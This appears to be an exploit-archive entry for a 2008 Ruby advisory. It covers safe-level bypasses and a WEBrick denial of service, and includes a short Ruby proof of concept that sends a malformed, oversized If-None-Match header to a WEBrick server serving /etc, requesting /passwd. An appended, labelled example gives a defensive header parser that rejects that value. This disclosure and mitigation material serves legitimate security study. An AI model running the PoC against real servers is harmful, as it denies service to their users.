26 lines
No EOL
1.2 KiB
Ruby
Executable file
source: https://www.securityfocus.com/bid/30644/info

Ruby is prone to multiple vulnerabilities that can be leveraged to bypass security restrictions or cause a denial of service:

- Multiple security-bypass vulnerabilities occur because of errors in the 'safe level' restriction implementation. Attackers can leverage these issues to make insecure function calls and perform 'Syslog' operations.
- An error affecting 'WEBrick::HTTP::DefaultFileHandler' can exhaust system resources and deny service to legitimate users.
- A flaw in 'dl' can allow attackers to call unauthorized functions.

Attackers can exploit these issues to perform unauthorized actions on affected applications. This may aid in compromising the application and possibly the underlying computers. Attackers can also cause denial-of-service conditions.

These issues affect Ruby 1.8.5, 1.8.6-p286, 1.8.7-p71, and 1.9 r18423. Prior versions are also vulnerable.

#-- Exploitable Server --
# require 'webrick'
# WEBrick::HTTPServer.new(:Port => 2000, :DocumentRoot => "/etc").start

#-- Attack --
require 'net/http'
res = Net::HTTP.start("localhost", 2000) { |http|
  req = Net::HTTP::Get.new("/passwd")
  req['If-None-Match'] = %q{meh=""} + %q{foo="bar" } * 100
  http.request(req)
}
p res
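
Added example (not part of the original advisory or PoC, and not WEBrick's own code): the request above carries a long, malformed If-None-Match value, so a server or fronting filter can validate that header with a length cap and an anchored, single-pass scanner before doing anything else with it. The function name and both limits are assumptions chosen for illustration.

```ruby
require 'strscan'

# Hypothetical limits for this example; tune them for your deployment.
MAX_HEADER_BYTES = 1024
MAX_TAGS = 32

# One entity-tag: optional W/ prefix, then a quoted string. The character
# class excludes '"', so each tag can match in only one way and a failed
# match costs at most one pass over the remaining input.
ETAG = /(?:W\/)?"[\x21\x23-\x7e]*"/
SEPARATOR = /[ \t]*,[ \t]*/

# Returns the list of entity-tags, ["*"] for the wildcard, or nil when the
# value is oversized or malformed (the caller can ignore the header or
# answer 400 Bad Request).
def parse_if_none_match(value)
  return nil if value.nil? || value.bytesize > MAX_HEADER_BYTES
  value = value.b.strip            # binary copy: no encoding errors on odd bytes
  return ["*"] if value == "*"

  scanner = StringScanner.new(value)
  tags = []
  loop do
    tag = scanner.scan(ETAG)       # anchored at the current position
    return nil if tag.nil? || tags.size >= MAX_TAGS
    tags << tag
    break if scanner.eos?
    return nil unless scanner.scan(SEPARATOR)
  end
  tags
end

if __FILE__ == $0
  # Constructed samples; the last one is the header value built by the PoC above.
  samples = ['"abc", W/"def"', '*', %q{meh=""} + %q{foo="bar" } * 100]
  samples.each { |s| puts "#{s[0, 30].inspect} -> #{parse_if_none_match(s).inspect}" }
end
```

The PoC value is 1006 bytes, so it passes the length cap and is rejected by the grammar check at its first character.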